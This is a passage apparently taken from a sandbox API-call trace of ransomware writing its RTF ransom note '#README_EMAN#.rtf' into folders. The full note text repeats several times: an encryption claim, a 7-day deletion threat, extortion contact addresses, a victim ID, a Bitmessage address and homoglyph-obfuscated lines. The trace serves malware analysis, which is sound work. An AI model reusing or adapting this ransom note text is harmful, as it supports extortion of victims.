were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.839] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.839] CloseHandle (hObject=0x2ec) returned 1 [0284.839] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0284.839] GetLastError () returned 0x2 [0284.839] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.840] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.840] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.840] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our 